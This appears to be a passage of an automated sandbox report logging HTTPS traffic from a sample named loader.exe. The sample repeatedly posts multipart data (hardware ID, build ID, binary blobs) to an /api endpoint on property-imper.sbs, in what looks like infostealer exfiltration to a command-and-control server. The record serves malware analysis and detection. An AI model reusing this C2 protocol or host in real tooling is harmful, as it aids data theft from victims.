                                                                                    Content-Type: multipart/form-data; boundary=90U7KFFO0ED
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 18126
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 13:09:29 UTC15331OUTData Raw: 2d 2d 39 30 55 37 4b 46 46 4f 30 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 44 45 31 33 38 37 31 38 45 33 45 41 35 43 30 30 41 38 32 30 41 41 38 35 44 32 36 41 37 43 0d 0a 2d 2d 39 30 55 37 4b 46 46 4f 30 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 30 55 37 4b 46 46 4f 30 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 30 36 37 38 33 38 38 34 37 0d 0a 2d 2d 39 30 55 37 4b 46 46 4f 30 45 44 0d
                                                                                    Data Ascii: --90U7KFFO0EDContent-Disposition: form-data; name="hwid"16DE138718E3EA5C00A820AA85D26A7C--90U7KFFO0EDContent-Disposition: form-data; name="pid"2--90U7KFFO0EDContent-Disposition: form-data; name="lid"yau6Na--5067838847--90U7KFFO0ED
                                                                                    2024-11-23 13:09:29 UTC2795OUTData Raw: c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93
                                                                                    Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
                                                                                    2024-11-23 13:09:30 UTC1015INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 13:09:30 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=9ot9tcmnvtl22t857jpp3fu5gs; expires=Wed, 19-Mar-2025 06:56:09 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bfx4pGXAsZKBlq%2BeMOngdZDCT9rl5jQp7ufRm5PqvimhFy4VfoQ34E1Nz2KskLG3B5ej%2FhnswdCj1pNHw1p2bTkrjGKvoJGZOdsz9dTRVtHVQuJsCo6RuouMnOWsrYHnva9l620%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e7164deec4b42f7-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1688&sent=12&recv=22&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19083&delivery_rate=1687861&cwnd=171&unsent_bytes=0&cid=d7cd0c309686544e&ts=868&x=0"
                                                                                    2024-11-23 13:09:30 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                    Data Ascii: eok 8.46.123.75
                                                                                    2024-11-23 13:09:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.449733172.67.162.844437372C:\Users\user\Desktop\loader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 13:09:32 UTC275OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=5LJLIKW958
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8741
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 13:09:32 UTC8741OUTData Raw: 2d 2d 35 4c 4a 4c 49 4b 57 39 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 44 45 31 33 38 37 31 38 45 33 45 41 35 43 30 30 41 38 32 30 41 41 38 35 44 32 36 41 37 43 0d 0a 2d 2d 35 4c 4a 4c 49 4b 57 39 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 4c 4a 4c 49 4b 57 39 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 30 36 37 38 33 38 38 34 37 0d 0a 2d 2d 35 4c 4a 4c 49 4b 57 39 35 38 0d 0a 43 6f 6e
                                                                                    Data Ascii: --5LJLIKW958Content-Disposition: form-data; name="hwid"16DE138718E3EA5C00A820AA85D26A7C--5LJLIKW958Content-Disposition: form-data; name="pid"2--5LJLIKW958Content-Disposition: form-data; name="lid"yau6Na--5067838847--5LJLIKW958Con
                                                                                    2024-11-23 13:09:32 UTC1015INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 13:09:32 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=0fah15a6a5dieh8t24e8qvmf24; expires=Wed, 19-Mar-2025 06:56:11 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IJXRsWXzVsoxOsOrRnszGwaKDKuIZHR3OHW%2FI9XyznfK62RcEOHI3GYdvj2TOPN0nhZpeBeUdgcnUvGX9FIvcXYNE%2Fp2YH0MyXfM7o4iU7KbIGZn8Q1R8AF5vwmgPsqmtP%2Fivds%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e7164ecea145e6a-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1713&sent=9&recv=14&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9674&delivery_rate=1678160&cwnd=214&unsent_bytes=0&cid=08a9c756d661fdfd&ts=728&x=0"
                                                                                    2024-11-23 13:09:32 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                    Data Ascii: eok 8.46.123.75
                                                                                    2024-11-23 13:09:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.449734172.67.162.844437372C:\Users\user\Desktop\loader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 13:09:34 UTC275OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=2XZROZJ1G
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 20388
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 13:09:34 UTC15331OUTData Raw: 2d 2d 32 58 5a 52 4f 5a 4a 31 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 44 45 31 33 38 37 31 38 45 33 45 41 35 43 30 30 41 38 32 30 41 41 38 35 44 32 36 41 37 43 0d 0a 2d 2d 32 58 5a 52 4f 5a 4a 31 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 58 5a 52 4f 5a 4a 31 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 30 36 37 38 33 38 38 34 37 0d 0a 2d 2d 32 58 5a 52 4f 5a 4a 31 47 0d 0a 43 6f 6e 74 65 6e 74
                                                                                    Data Ascii: --2XZROZJ1GContent-Disposition: form-data; name="hwid"16DE138718E3EA5C00A820AA85D26A7C--2XZROZJ1GContent-Disposition: form-data; name="pid"3--2XZROZJ1GContent-Disposition: form-data; name="lid"yau6Na--5067838847--2XZROZJ1GContent
                                                                                    2024-11-23 13:09:34 UTC5057OUTData Raw: 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c
                                                                                    Data Ascii: lrQMn 64F6(X&7~`aO@dR<
                                                                                    2024-11-23 13:09:35 UTC1021INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 13:09:35 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=2ve7j3hva00pk20uj2k2vcrfs3; expires=Wed, 19-Mar-2025 06:56:13 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZYhQHNIen306kXdqadG2Ihpad67bK5lRg9bDi3DDXS5fZ2R789QZup1gMxFC%2F9jMxzcVv0Eqt80i1G%2Bq%2FFVgL1D68g4xzO8V5S7WvzFBDHKMeTzb4K%2FagoOg1PohFngq%2B0mWWWs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e7164fb4a3b8c0b-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1816&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21343&delivery_rate=1580942&cwnd=206&unsent_bytes=0&cid=05135540dd958e1e&ts=898&x=0"
                                                                                    2024-11-23 13:09:35 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                    Data Ascii: eok 8.46.123.75
                                                                                    2024-11-23 13:09:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.449735172.67.162.844437372C:\Users\user\Desktop\loader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 13:09:36 UTC281OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=8DOWMO1PBPZJPZ3O
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 1251
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 13:09:36 UTC1251OUTData Raw: 2d 2d 38 44 4f 57 4d 4f 31 50 42 50 5a 4a 50 5a 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 44 45 31 33 38 37 31 38 45 33 45 41 35 43 30 30 41 38 32 30 41 41 38 35 44 32 36 41 37 43 0d 0a 2d 2d 38 44 4f 57 4d 4f 31 50 42 50 5a 4a 50 5a 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 44 4f 57 4d 4f 31 50 42 50 5a 4a 50 5a 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 30 36 37 38 33 38 38 34 37 0d
                                                                                    Data Ascii: --8DOWMO1PBPZJPZ3OContent-Disposition: form-data; name="hwid"16DE138718E3EA5C00A820AA85D26A7C--8DOWMO1PBPZJPZ3OContent-Disposition: form-data; name="pid"1--8DOWMO1PBPZJPZ3OContent-Disposition: form-data; name="lid"yau6Na--5067838847
                                                                                    2024-11-23 13:09:37 UTC1014INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 13:09:37 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=4dm75t5ki0lcgq8h19u5e1c1uu; expires=Wed, 19-Mar-2025 06:56:16 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iqxn02xzerb5eEqoji0JcEfLpEp1sKUCvM2aGbhe9X3GAnpHg0jcoR98STJrr9VoXcjreJg61szDFNkGq%2ByxHx2Hzy76k8eMN%2FedVCvXfAjt6C7NE%2FiMUveAbsqIbhhQNT46Ee0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e71650b393e4204-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1686&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2168&delivery_rate=1659090&cwnd=247&unsent_bytes=0&cid=f3b7071fddf37ceb&ts=712&x=0"
                                                                                    2024-11-23 13:09:37 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                    Data Ascii: eok 8.46.123.75
                                                                                    2024-11-23 13:09:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.449736172.67.162.844437372C:\Users\user\Desktop\loader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 13:09:39 UTC286OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=C2USC44DK4GFZQ6J4BR
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 582608
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 13:09:39 UTC15331OUTData Raw: 2d 2d 43 32 55 53 43 34 34 44 4b 34 47 46 5a 51 36 4a 34 42 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 44 45 31 33 38 37 31 38 45 33 45 41 35 43 30 30 41 38 32 30 41 41 38 35 44 32 36 41 37 43 0d 0a 2d 2d 43 32 55 53 43 34 34 44 4b 34 47 46 5a 51 36 4a 34 42 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 32 55 53 43 34 34 44 4b 34 47 46 5a 51 36 4a 34 42 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 30
                                                                                    Data Ascii: --C2USC44DK4GFZQ6J4BRContent-Disposition: form-data; name="hwid"16DE138718E3EA5C00A820AA85D26A7C--C2USC44DK4GFZQ6J4BRContent-Disposition: form-data; name="pid"1--C2USC44DK4GFZQ6J4BRContent-Disposition: form-data; name="lid"yau6Na--50
                                                                                    2024-11-23 13:09:39 UTC15331OUTData Raw: cd 8c 67 68 55 e2 f1 7b 80 a4 f7 ce bb 8a 76 7e 1f b0 d3 50 bd 33 1e b1 d0 d0 82 c5 83 94 47 11 9c a3 ff 45 bc 04 4c 4b 21 b0 0f f7 51 25 01 2a f0 04 94 3f 0f 76 1c d1 38 0c de 49 37 6e a6 82 53 11 36 cf ac 67 39 fc e6 12 40 76 61 f1 ed ff b7 32 52 0a c8 4e 6b 01 04 90 5c 08 c9 b3 0e a0 dc 1f 4d c3 68 20 1c 8b 64 32 a0 c4 9e fd 3e 10 0d a8 5f ac 9e 7f 53 24 2f 8e a8 8b 1e b5 03 85 02 38 c4 96 ed fa e5 da fd 14 a2 69 c6 1a d8 5a 2b 8c 36 ba 49 78 01 1e 7e 62 5b 23 d5 53 c0 6e 30 5c d3 95 9c f5 5e a8 1c ad 8d 4b 95 a0 d2 46 3e ec fc 7c c3 39 7e df 38 38 5e c9 ba a0 1d 77 fa 58 46 93 9f 2a e8 78 42 0d 7e a7 5a a7 22 16 b1 65 e5 ba b3 34 68 d7 bc 5d d8 8d 36 3e 11 d6 bc 50 ad ec d6 e2 c8 8f c6 63 24 4b 40 5b a4 91 79 98 9f 7c 06 1d 93 77 93 68 05 11 1d 42 40
                                                                                    Data Ascii: ghU{v~P3GELK!Q%*?v8I7nS6g9@va2RNk\Mh d2>_S$/8iZ+6Ix~b[#Sn0\^KF>|9~88^wXF*xB~Z"e4h]6>Pc$K@[y|whB@
                                                                                    2024-11-23 13:09:39 UTC15331OUTData Raw: cc d0 55 eb 92 ba 73 1c 0f 2e af d6 fd 48 b2 93 2d b7 16 b9 26 17 f6 e0 45 92 39 8b b1 89 1e 50 6a 9b fd 3e 81 fa c1 9b 93 48 ba 8a 04 4d 21 71 cd ff 08 e9 ed d8 31 eb 2e c3 9a 9a d2 a7 63 e5 c7 6a e3 c1 4a 2a 99 30 2a 3d 92 6e 1e 2c 73 12 de 30 8a 34 4f 20 f8 e0 88 18 e6 31 e7 c7 1b c7 e7 a2 0e b7 99 c3 41 74 c3 b8 b5 1f d8 38 1f bf 2d ef 21 05 07 6a 9f e8 69 3b 37 99 30 bf fd c4 85 91 a7 31 c4 3e 01 7b 1f 7e fa 9b c3 5b 19 3e 56 93 3b 23 46 af ac ad 22 9c 04 f0 87 d8 59 92 3b 67 74 9e 3c d5 47 bc b4 a9 a1 e2 e2 ad 8e de 6c 41 93 c1 3b ae 48 f8 f6 43 3b e7 97 02 96 98 72 92 5a ba f6 58 8b 6b c7 cc fc 45 8c 67 bf 5d 49 7a 25 8f 89 de 5d f6 fc 89 45 dc c6 d9 85 4f fa 0d 73 c6 4d 09 d8 96 4f e0 b9 78 04 a1 47 78 4a f3 ab bb e2 8b fa ca 1e c3 7a 33 83 02 d8
                                                                                    Data Ascii: Us.H-&E9Pj>HM!q1.cjJ*0*=n,s04O 1At8-!ji;701>{~[>V;#F"Y;gt<GlA;HC;rZXkEg]Iz%]EOsMOxGxJz3
                                                                                    2024-11-23 13:09:39 UTC15331OUTData Raw: f8 bf 4d 3d 67 47 e5 c7 5a 59 ee 40 f9 36 53 fd d0 7f 27 57 17 93 a9 68 b2 06 db a9 77 b4 a6 9a af 0a e1 67 12 52 52 1a 04 e2 2b 14 ee e3 2f 0f 66 ea 5a 07 b1 a4 86 6e 33 43 95 01 5f f6 ba bd 07 ef 39 5e fd 61 e5 ac ec c0 53 f6 c6 fe d4 12 08 1c 41 78 f1 80 e5 ea f0 47 7f 0f 0b 1b f0 d7 8f b7 40 3f 2a 1b 1d 70 ab 8e 84 db 23 9d 44 9b c9 01 de 25 d5 04 54 5c 65 08 73 a8 ee 71 07 fc e4 0d f4 b3 bb 8e 62 bc 13 7c 94 3d 7b 2b be e6 9e bc 0e 56 3a 85 ce 4f 2f 05 30 ed e2 0f eb 55 8c f4 9c 1d 6f 19 5d 34 6b 1f 69 da 01 98 11 bf 47 82 c8 8b 6d 75 87 0c 70 a3 2b bb d6 5b 39 8d 65 21 c0 f0 b6 f7 29 f9 45 bf 7a 77 f4 a2 16 b7 4f 3d 98 bb fc aa 3e 38 7e 90 a8 8a 6f b0 e2 f9 38 5f c6 62 2b 5c 7e 5d 4c 88 f0 89 ba e7 30 6e 70 0c 68 2b 06 f0 bb 3e 91 a5 c8 7c c3 d5 c9
                                                                                    Data Ascii: M=gGZY@6S'WhwgRR+/fZn3C_9^aSAxG@?*p#D%T\esqb|={+V:O/0Uo]4kiGmup+[9e!)EzwO=>8~o8_b+\~]L0nph+>|
                                                                                    2024-11-23 13:09:39 UTC15331OUTData Raw: 73 d1 64 7f 47 07 19 d2 fe df c2 fe ff ef 37 01 31 30 d1 01 97 46 80 8c 19 21 42 10 b8 89 d0 46 00 bd f3 c3 19 78 24 39 86 24 c9 85 62 a6 57 78 b8 5d 01 56 91 2e 68 00 5b 13 da 88 ed 41 83 32 64 45 1e 3e 46 2d e5 bb f3 f0 78 7b 73 6c f2 41 75 94 ea 97 d3 a3 99 a6 e1 26 c0 0a 72 92 00 7c 1d 82 dd 21 c5 de a0 20 a3 f2 c7 63 72 17 bf 79 4e 6e 47 2d 08 94 fb 92 fb d0 79 56 f8 4f b0 9f 18 b0 9a 44 ac 24 7a b2 0d dc 4e 09 73 99 c6 68 3d f6 86 5d d7 af 40 03 61 c6 f4 20 ee 49 04 65 a7 55 d3 99 17 40 5b d7 33 2a 5b ee 61 ad ae 44 29 06 d1 85 d6 ce 93 c3 1f ef 79 a2 7d c3 a2 c8 18 ef bd 5a a6 86 c1 76 c2 0c 83 b8 67 e6 70 8e 6d ed 22 67 f6 85 0d 4c 59 e4 c4 c5 17 52 37 ac 8b 5a 4f 18 14 82 94 83 fb 95 77 ac 72 b8 0e d1 f8 c2 f5 32 27 cd 8a 72 53 3a 3b 98 16 72 b2
                                                                                    Data Ascii: sdG710F!BFx$9$bWx]V.h[A2dE>F-x{slAu&r|! cryNnG-yVOD$zNsh=]@a IeU@[3*[aD)y}Zvgpm"gLYR7ZOwr2'rS:;r
                                                                                    2024-11-23 13:09:39 UTC15331OUTData Raw: 21 2e 3c e3 ef b4 48 15 a0 88 6f 7f 82 84 5a d1 c1 84 75 d1 65 1f c3 4c 4f c9 d5 1b 35 c3 8f 2e 5f dd dc 07 2e ab a4 34 51 1a a1 68 fb 75 5c 56 26 74 2b f4 55 a5 d9 9c 7f 73 7d f8 4c a0 e4 fa 9f 4f d5 2d 1e 14 fd 03 a4 12 0b 27 03 d7 1e f8 ed 29 73 87 30 5b e9 1d 28 78 bf ea 6e 8b f9 ce fd 60 c4 c0 01 c6 c0 98 c8 e0 99 aa 84 99 45 9d 76 f9 d3 c4 86 e2 ac 75 da 86 9c dd 62 84 7f d3 86 fb 4d 8e b0 3a a1 ab 38 53 08 6e 6e 5a 29 fe c7 51 86 2b 60 c4 f8 b4 93 b8 76 cf a7 65 1f 66 44 b6 da 7c c2 b4 e1 90 9b a2 e2 a0 a3 5b 93 82 b3 9c 2b c6 58 73 d5 fd 94 a1 0a 66 d9 97 9b a0 d1 12 61 f4 64 fd 6b 88 26 a8 94 8a 78 7d 1b 05 2e 8d 2a 70 d0 6b 0a 24 e6 20 16 cc e1 d1 8c 1f 1f be 76 66 1c 6f d5 0b 34 ed e9 74 7c 80 a2 d4 c1 f7 2f c2 95 0a f4 46 23 8a 04 fa 84 54 1c
                                                                                    Data Ascii: !.<HoZueLO5._.4Qhu\V&t+Us}LO-')s0[(xn`EvubM:8SnnZ)Q+`vefD|[+Xsfadk&x}.*pk$ vfo4t|/F#T
                                                                                    2024-11-23 13:09:39 UTC15331OUTData Raw: bc 0a 34 af 2e 1d bd ba d9 8a 70 35 6a fe 3e 80 91 ac 73 44 f3 f7 8f f5 c5 46 27 dd 29 9e e7 24 1c b0 78 79 a6 0e 04 c0 81 70 b0 07 74 21 2e 27 b3 f9 51 64 cb 44 8e 3b 1c ce 12 6c de 1f ed 92 fa 18 16 0a 29 1f 93 8a ac da 9e 65 16 11 ec 9d 44 4e 72 15 5b bd a6 6f d3 bc 71 7b 48 12 3c 67 a3 5f 2a 10 7b 68 fb 4a 40 73 1c 97 13 88 01 83 6c 74 57 4f 55 48 e0 f2 b8 c6 b3 e7 64 ce 74 73 36 99 3d f2 7c cf 4c 77 e9 f7 b4 cd 0c da 56 27 3a 96 36 b0 3e c6 3d fc 26 74 ab 9f 1f 44 5f 0f 9c 56 3d bf 0f 7c 0a f3 b2 26 54 72 2f 01 d6 4f 81 1b 6f f9 c1 ac 07 0e f4 4b 73 f9 9a 7b 59 4e a8 31 af 15 d2 7c 0b 0a 26 df 90 6a bf 5c aa c7 29 2e af dc ad 7c 9f ef 7a c1 46 c7 03 0c 9c ba 66 3a 8e 3c 24 0b 4e b3 d7 30 41 2c 59 58 3a 0d 89 fb f7 a3 b6 5b 86 58 3d ab fa 9a 77 cb fd
